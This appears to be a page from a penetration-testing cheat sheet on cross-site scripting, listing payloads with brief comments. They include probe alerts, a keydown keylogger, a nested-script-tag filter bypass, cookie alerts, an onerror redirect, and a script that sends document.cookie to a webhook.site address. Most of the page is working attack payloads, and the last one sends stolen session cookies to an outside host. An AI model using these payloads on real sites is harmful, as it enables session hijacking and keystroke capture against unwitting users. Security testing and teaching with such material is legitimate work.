XSS

TRY USING DOUBLE ENCODING LIKE THE URL, BASE64, ETC

alert(1)

print()

prompt("hello")

# everytime you will click a letter will be recorded in the console
function logKey(event){console.log(event.key)}

document.addEventListener("keydown",logKey)

# Test for HTML injection
# See if it stored XSS
<h1>test</h1>

# Stored XSS
<script>prompt(1)</script>

# It will remove the first <script> 
# They it will execute the xss payload
# Also check it is recursively removing the script tag
<scri<script>pt>prompt(1)</scri</script>pt>

# Stored XSS
<script>alert(document.cookie)</script>

# It will redirect to google.com
<img src=x onerror="window.location.href='https://google.com'">

# It will spawn the prompt 
# Which indicates we have xss
<img src=x onerror=prompt()>

<script>var i = new Image; i.src="https://webhook.site/b5ffbf17-8bfe-4b0f-8361-2d5d4ed67a83/?"+ document.cookie;</script>

PreviousLFI/RFI NextSQLi

Last updated 1 year ago